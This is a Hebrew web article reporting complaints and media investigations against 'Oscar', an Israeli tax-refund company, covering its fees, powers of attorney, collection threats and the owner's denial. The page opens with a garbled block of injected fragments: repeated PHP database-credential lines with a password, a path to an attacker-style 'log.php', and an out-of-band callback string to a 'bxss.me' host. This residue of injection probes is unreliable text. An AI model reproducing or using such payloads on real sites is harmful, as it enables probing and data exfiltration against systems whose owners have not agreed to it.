$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> תלונות רבות כנגד שיטות הפעולה של חברת אוסקר לביצוע החזרי מס
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

שיטות הפעולה המיוחדות של "אוסקר" החברה להחזרי מס

תאריך: 22/09/2010 12:24   מחבר: מערכת האתר

החזר מס

מי לא רוצה לקבל החזרים ממס הכנסה ? אין אחד כזה. שנים אנו משלמים ומרגישים שהמדינה מכניסה יד עמוקה לתוך כיסנו ולמעשה מתחלקת איתנו בהכנסות פרי עמלנו. אל הנישה המיוחדת הזו חדרה בסערה בשנת 2004 חברת  "ג.מ. אוסקר ניהול ושיווק פיננסי בע"מ". החברה נוסדה על ידי שני שותפים. גלעד אוסקר ונוי מורג.

מייסדי החברה ידעו את מה שרובנו ידענו אך לא היה לנו כוח להרים את הכפפה, שמס הכנסה גובה לעיתים יותר מס ממה שאנו חייבים לשלם. אין כאן עניין של זדון מצד מס הכנסה. שיטת הגבייה, חישוב גובה המס והדרישה לתשלום מקדמות על סמך תחזיות שכר, יוצרות בסוף שנה, גביית יתר, המזכה את החייב בהחזרים. לאף אחד מאיתנו אין כוח להילחם עם הביורוקרטיה, זה לא מסתדר לנו תודעתית, שניתן בכלל לקבל כסף ממס הכנסה. התרגלנו שהכיוון הוא תמיד הפוך. מס הכנסה לוקח ולא מחזיר.

מתברר, שאפשר להיות קצת אופטימיים. בנסיבות אלו מציעה החברה את שירותיה ללקוחות. היא למעשה אומרת להם, שבו בשקט, אנו נעשה את העבודה השחורה בשבילכם, תמורת עמלה. מה יש להפסיד, אומרים לעצמם הלקוחות. בלאו הכי, אם החברה לא הייתה פונה אלינו, לא היינו בכלל חושבים לבקש החזרי מס. עד כאן זה נשמע מבטיח. בחלוף השנים, התברר, שחברת אוסקר, לא בדיוק פועלת לפי אמות מידה תקינות וחוקיות, לכאורה.

כלי התקשורת ערכו תחקירים אודות החברה ומצאו ליקויים בהתנהלותה. באוגוסט 2008 פורסם תחקיר בתוכנית  "שומר מסך" של אמנון לוי, שם הוצגו טענות וחשדות לתרמית רחבה במכירת ביטוחים ותוכניות חיסכון בשמה של חברת הפניקס; לא מעט תביעות הגיעו לבתי המשפט בנושא נגד חברת אוסקר - ועשרות תביעות בנושאים שונים מפורטות בדו"ח העסקי של חברת דן אנד ברדסטריט אודות החברה, בבתי דין שלום, בתי דין לעבודה ובתי משפט לתביעות קטנות.

רשת האינטרנט מלאה בפורומים של נפגעי החברה. לתוך הדינימיקה הזו נכנס גם העיתון "גלובס" וערך תחקיר אודות שיטות עבודתה של החברה, כפי שעולה מהתלונות הרבות שקיבל ומתוך סריקה של אתרים ורשתות חברתיות העוסקים ודנים בתפקוד החברה. אז איך זה עובד ? ועל סמך מה מתקבל הרושם למעשה מרמה לכאורה, מצד החברה ?

גיוס לקוח

לקוח מתקשר לחברה לפי הפרטים שפירסמה. נציג החברה מציעה בדיקת החזר מס לשכירים ל - 6 שנים אחורה. הבדיקה והטיפול כוללים קשר עם מס הכנסה, דמי פתיחת תיק בעלות שנעה מסכום של 630 ש"ח ועד 950 שקל. תוך כדי שיחה מעודדים את הלקוח להמליץ לחברים אחרים להתקשר עם החברה תוך מתן הטבות ויצירת מסלול VIP לאלו שיביאו הכי הרבה חברים. במקרה של קבלת החזרי מס, החברה גובה עמלה של 25%. במסלול VIP שיעור העמלה מגיע ל - 30%.

יפוי כוח

כמקובל בחברות מסוג זה, נדרש הלקוח לייפות את כוחה של החברה לפעול בשמו. החתימה נעשית באמצעות משלוחי פקסים. הלקוחות, כך מתברר, לא בדיוק בודקים את גובה העמלות ומשך תקופת ייפוי הכוח. החברה מבצעת בדיקות מדי שנה על סמך יפוי הכוח ולא מדווחת ללקוח על בסיס שנתי. נציגיה יכולים לפנות כעבור שנים ללקוח שייפה את כוחם, להחזיר לו מס ולבקש במקביל דמי טיפול למרות שלא אישר זאת בייפוי הכוח. מתברר, כי הלקוחות מוחתמים על ייפוי כוח ארוך טווח וכלל לא טורחים לבדוק את האותיות הקטנות.

אין עם מי לדבר

לאחר החתימה על יפוי הכוח וביצוע התשלום בגין פתיחת התיק, לא ניתן להשיג את נציגי החברה. אם כבר עונים לך, מקבלים תשובות כמו: "זה בטיפול", "יחזרו אליך בהקדם" לקוחות VIP לא זוכים לביקור הנציג בחברה במקום עבודתם או מגוריהם. יש לקוחות שזכו לקבל את החזר המס, שילמו עמלה, שכחו מהחברה למשך שנים ובוקר אחד נציג החברה חוזר אליהם עם דרישות שלא נמצא להם עיגון בהסכם ההתקשרות.

לא שילמת יש הוצאה לפועל

לקוח מרוצה שקיבל החזר מס, שילם דמי טיפול ועמלה, מאמין לתומו, שיותר לא ישמע מהחברה ולא יחשף לדרישות תשלום נוספות. מהתחקיר עולה כי נציגי החברה לא שוכחים את הלקוחות שלהם. כעבור שנים הם פונים אליהם בדרישה לשלם עמלות שלא שולמו או דמי טיפול שלא כובדו. לקוח שדוחה את הדרישה ובצדק מבחינתו, מאויים על ידי החברה בפתיחת תיק בהוצאה לפועל.

לקוחות שפוחדים להתעסק עם רשויות וגובים מגיעים להסדר עם החברה ומשלמים. אחרים, שלא מתרגשים מהם ומשיבים מלחמה גם באמצעות יצירת תהודה תקשורתית ואינטרנטית, לא נופלים למלכודת והחברה מבינה שעם כאלה לקוחות לא כדאי להתעסק.

על-פי עדויות שהגיעו ל"גלובס", נמסר להם על ידי החברה שאם לא ישלמו חוב של 2000 שקל יתבעו בהוצאה לפועל בסכומים הנעים בין  18 אלף ל-30 אלף שקל .

תגובת גלעד אוסקר

גלעד אוסקר, מבעלי החברה מסר בתגובה לפניית "גלובס: "מרבית הטענות אינן מדויקות, ומקצתן חוטאות לאמת. חברת אוסקר החזרי מס בע"מ היא אחת הגדולות ביותר בישראל בנושא החזרי מס לשכירים, המטפלת בכ-20 אלף בתי-אב. לאחרונה, מבדיקות שביצעה החברה, התברר כי לקוחות רבים מפרים את התחייבויותיהם על-פי הסכם ההתקשרות שנחתם בין הצדדים, באופן שהם מתחמקים באופן שיטתי מתשלום עמלה לחברה בגין החזרי מס שקיבלו מרשויות המס במרוצת השנים.


"בנסיבות אלה" הוסיף, "בהן חלק מהלקוחות נמנעו במשך שנים רבות לשלם לחברה תשלומים בגין עמלה כמתחייב על-פי הסכם ההתקשרות עמם - חרף פניות חוזרות ונשנות של החברה, הן בעל-פה והן בכתב, ללא הועיל וללא מענה - יזמה החברה מסע גבייה כולל באמצעות פנייה טלפונית, במטרה לעמוד על זכויותיה ולגבות את העמלה בגין השירותים שסיפקה במיומנות ובמקצועיות כה רבה.

חקירת משטרה

זרם התלונות שהוגשו למשטרת ישראל בחשד לקבלת דבר במרמה, יכול ויזרז את המשטרה לפתוח בחקירה כנגד החברה בחשד המיוחס להם. נמתין ונדווח על התוצאות